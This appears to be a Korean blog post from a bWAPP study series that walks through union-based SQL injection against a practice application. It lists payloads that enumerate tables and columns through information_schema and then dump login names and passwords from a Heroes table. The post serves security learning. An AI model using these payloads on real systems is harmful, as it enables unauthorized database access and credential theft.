'union select 1,table_name,3,4 from information_schema.tables where table_schema!="information_schema"#
출력이 한줄이라 다른 테이블 이름을 보려면 연산자를 사용해서 하나씩 봐야한다.
'union select 1,table_name,3,4 from information_schema.tables where table_schema!="information_schema" and table_name!="Blog"#
Heroes 테이블의 컬럼을 확인해보자.
'union select 1,column_name,3,4 from information_schema.columns where table_name="Heroes"#
이번에도 연산자를 사용해서 다른 컬럼명도 확인해보자.
'union select 1,column_name,3,4 from information_schema.columns where table_name="Heroes" and column_name!="Id"#
'union select 1,column_name,3,4 from information_schema.columns where table_name="Heroes" and column_name!="Id" and column_name!="Login" and column_name!="Password"#
'union select 1,Login,3,Password from heroes#
'union select 1,Login,3,Password from heroes limit 1,1#
limit 옵션을 넣어 다른 계정 정보들도 확인할 수 있다.
'공부 > bWAPP' 카테고리의 다른 글
SQL Injection (SQLite) (0) | 2020.02.27 |
---|---|
SQL Injection (Login Form/User) (0) | 2020.02.26 |
SQL Injection (AJAX/JSON/jQuery) (0) | 2020.02.25 |
SQL Injection (POST/Search, Select) (0) | 2020.02.24 |
SQL Injection (GET/Select) (0) | 2020.02.23 |